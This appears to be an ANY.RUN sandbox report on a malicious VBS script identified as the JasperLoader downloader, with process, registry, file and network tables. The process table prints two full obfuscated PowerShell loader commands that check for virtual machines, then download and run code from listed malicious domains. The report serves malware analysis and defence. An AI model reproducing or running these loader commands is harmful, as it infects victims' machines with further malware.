File name: | IT847561961795194146814681226589.vbs |
Full analysis: | https://app.any.run/tasks/2c292eab-ad1d-4723-b807-b10e893b900a |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 15, 2019, 14:25:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | D0CD197029FC2AB8FDC71D7E4AC9DA01 |
SHA1: | 8453064178998C7E14EAEC2FBEE3901D2F188022 |
SHA256: | 0887A1C7C15A5388AE489E7D7451A7B238A68F325ACE91B8FE24996F1BAD062B |
SSDEEP: | 48:+fPP9aWjkDZkRZQFREdckrXwnwUC4ZB7wG/EW7KG2lIKGCrhJBsyUDUqJwor4712:a155bTEbX |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2188 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT847561961795194146814681226589.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
1484 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $hcfve='';105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,36,117,97,119,120,121,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,105,110,48,48,99,101,46,106,115,34,59,36,100,100,118,117,121,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,77,105,99,114,111,115,54,52,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,101,109,101,46,101,109,101,114,97,108,100,115,117,114,102,118,105,115,105,111,110,46,99,111,109,47,118,50,105,46,112,104,112,63,110,101,101,100,61,106,115,38,118,105,100,61,112,101,99,49,48,118,98,115,38,118,99,101,97,99,34,41,124,111,117,116,45,102,105,108,101,32,36,117,97,119,120,121,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,117,97,119,120,121,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,105,116,116,46,99,50,49,110,111,114,109,97,46,105,110,102,111,47,97,112,105,63,105,102,116,118,100,34,44,36,100,100,118,117,121,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,100,100,118,117,121,59,125,99,97,116,99,104,123,125,59|%{$ybaz=[char]$_;$hcfve+=$ybaz};iex $hcfve; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3640 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Win00ce.js" | C:\Windows\System32\WScript.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
3984 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fsjya='';function bhztwe($fhiztdg){return [Char]([int](16908 - 4211 - 9122 - 3573 + $fhiztdg));};103,100,38,30,38,69,99,114,43,83,71,65,115,106,114,115,112,99,39,44,76,95,107,99,30,43,107,95,114,97,102,30,37,65,76,122,80,77,122,80,83,122,83,63,122,64,87,37,30,43,109,112,30,38,69,99,114,43,85,107,103,77,96,104,99,97,114,30,43,97,106,95,113,113,30,85,103,108,49,48,93,65,109,107,110,115,114,99,112,81,119,113,114,99,107,30,43,78,112,109,110,99,112,114,119,30,75,109,98,99,106,39,44,75,109,98,99,106,30,43,107,95,114,97,102,30,37,84,103,112,114,115,95,106,64,109,118,122,84,75,117,95,112,99,122,73,84,75,37,30,39,121,30,99,118,103,114,57,30,123,8,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,100,95,106,113,99,57,8,38,72,109,103,108,43,78,95,114,102,30,34,67,76,84,56,83,113,99,112,78,112,109,100,103,106,99,30,37,90,63,110,110,66,95,114,95,90,80,109,95,107,103,108,101,90,75,103,97,112,109,113,109,100,114,37,39,42,30,34,67,76,84,56,83,113,99,112,78,112,109,100,103,106,99,42,30,38,72,109,103,108,43,78,95,114,102,30,30,34,99,108,116,56,78,83,64,74,71,65,30,32,90,74,103,96,112,95,112,103,99,113,32,39,42,30,89,67,108,116,103,112,109,108,107,99,108,114,91,56,56,69,99,114,68,109,106,98,99,112,78,95,114,102,38,37,63,110,110,106,103,97,95,114,103,109,108,66,95,114,95,37,39,42,30,34,67,76,84,56,114,99,107,110,30,122,30,35,121,8,30,30,103,100,38,30,82,99,113,114,43,78,95,114,102,30,38,30,72,109,103,108,43,78,95,114,102,30,34,93,30,32,75,103,97,112,109,113,109,100,114,67,98,111,99,44,103,108,103,32,30,39,30,39,121,8,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,93,57,8,30,30,123,8,30,30,103,100,38,30,31,34,96,101,93,69,109,109,98,78,63,114,102,30,39,121,8,30,30,30,30,34,104,101,113,96,116,30,59,30,72,109,103,108,43,78,95,114,102,30,34,93,30,32,117,104,118,103,101,98,32,57,8,30,30,30,30,114,112,119,121,8,30,30,30,30,30,30,113,97,30,43,78,95,114,102,30,34,104,101,113,96,116,30,43,84,95,106,115,99,30,34,110,103,98,57,8,30,30,30,30,30,30,112,103,30,43,78,95,114,102,30,34,104,101,113,96,116,57,30,8,30,30,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,93,57,8,30,30,30,30,123,97,95,114,97,102,121,8,30,30,30,30,30,30,34,96,101,93,69,109,109,98,78,63,114,102,30,59,30,34,100,95,106,113,99,57,8,30,30,30,30,123,8,30,30,123,8,123,8,103,100,38,30,34,96,101,93,69,109,109,98,78,63,114,102,30,39,121,8,30,30,34,100,97,104,114,114,96,104,30,30,59,30,37,37,57,8,30,30,34,100,97,103,117,103,97,97,30,59,30,34,96,101,93,69,109,109,98,78,63,114,102,30,41,30,32,90,98,109,97,115,107,99,108,114,113,32,57,8,30,30,34,100,96,103,97,116,117,101,30,30,30,30,59,30,34,96,101,93,69,109,109,98,78,63,114,102,30,41,30,32,90,85,103,108,98,109,117,113,71,108,98,99,118,103,108,101,81,99,112,116,103,97,99,44,104,113,32,57,8,30,30,34,97,102,118,119,103,30,59,30,76,99,117,43,77,96,104,99,97,114,30,81,119,113,114,99,107,44,76,99,114,44,85,99,96,65,106,103,99,108,114,57,8,30,30,34,97,102,118,119,103,44,65,112,99,98,99,108,114,103,95,106,113,30,59,30,89,81,119,113,114,99,107,44,76,99,114,44,65,112,99,98,99,108,114,103,95,106,65,95,97,102,99,91,56,56,66,99,100,95,115,106,114,65,112,99,98,99,108,114,103,95,106,113,57,8,30,30,103,100,30,38,43,108,109,114,30,38,82,99,113,114,43,78,95,114,102,30,34,100,96,103,97,116,117,101,30,30,39,30,39,121,30,30,34,97,102,118,119,103,44,66,109,117,108,106,109,95,98,81,114,112,103,108,101,38,37,102,114,114,110,56,45,45,120,120,103,44,96,99,106,106,99,116,103,106,106,99,98,97,44,97,109,107,45,116,48,103,44,110,102,110,61,108,99,99,98,59,104,113,36,37,39,30,122,30,109,115,114,43,100,103,106,99,30,34,100,96,103,97,116,117,101,30,57,30,123,8,30,30,103,100,30,38,43,108,109,114,30,38,82,99,113,114,43,78,95,114,102,30,34,100,97,103,117,103,97,97,39,30,39,121,30,34,97,102,118,119,103,44,66,109,117,108,106,109,95,98,81,114,112,103,108,101,38,37,102,114,114,110,56,45,45,120,120,103,44,96,99,106,106,99,116,103,106,106,99,98,97,44,97,109,107,45,116,48,103,44,110,102,110,61,108,99,99,98,59,96,109,98,119,36,37,39,30,122,30,109,115,114,43,100,103,106,99,30,34,100,97,103,117,103,97,97,57,30,30,123,8,30,30,114,112,119,121,8,30,30,30,30,69,99,114,43,65,109,108,114,99,108,114,30,34,100,97,103,117,103,97,97,122,30,85,102,99,112,99,43,77,96,104,99,97,114,30,121,34,93,30,43,107,95,114,97,102,30,34,112,99,101,99,118,123,30,122,30,68,109,112,67,95,97,102,43,77,96,104,99,97,114,121,30,34,100,97,104,114,114,96,104,30,41,59,30,34,93,30,43,112,99,110,106,95,97,99,30,37,44,44,38,44,39,37,42,37,34,47,37,123,57,8,30,30,30,30,103,99,118,30,34,100,97,104,114,114,96,104,57,8,30,30,123,97,95,114,97,102,121,123,57,8,123,8|%{$fsjya += bhztwe($_);};iex $fsjya; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2280 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2188) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2188) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (1484) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z3KIYTBLD888O71U3L0Q.temp | — | |
MD5:— | SHA256:— | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3ZPBAV4JD8U9OXRIP9U.temp | — | |
MD5:— | SHA256:— | |||
2280 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs4C1F.tmp | — | |
MD5:— | SHA256:— | |||
2280 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs4C20.tmp | — | |
MD5:— | SHA256:— | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\wjxigd | — | |
MD5:— | SHA256:— | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF133f7d.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3984 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134903.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1484 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Win00ce.js | text | |
MD5:488BAC9789B6E3AAEDA0C97AFE6EFB6D | SHA256:B618FC29EB0CE05778B762293FCD9D499E2D97EFFE144D16856819EB221AB401 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3984 | powershell.exe | GET | — | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=js& | CH | — | — | malicious |
1484 | powershell.exe | GET | 200 | 185.158.249.122:80 | http://eme.emeraldsurfvision.com/v2i.php?need=js&vid=pec10vbs&vceac | NL | text | 18.2 Kb | malicious |
1484 | powershell.exe | GET | 200 | 185.212.47.163:80 | http://itt.c21norma.info/api?iftvd | DE | text | 10 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1484 | powershell.exe | 185.158.249.122:80 | eme.emeraldsurfvision.com | easystores GmbH | NL | malicious |
3984 | powershell.exe | 176.10.118.245:80 | zzi.bellevilledc.com | SOFTplus Entwicklungen GmbH | CH | malicious |
1484 | powershell.exe | 185.212.47.163:80 | itt.c21norma.info | 23media GmbH | DE | unknown |
Domain | IP | Reputation |
---|---|---|
eme.emeraldsurfvision.com |
| malicious |
itt.c21norma.info |
| unknown |
zzi.bellevilledc.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1484 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader) |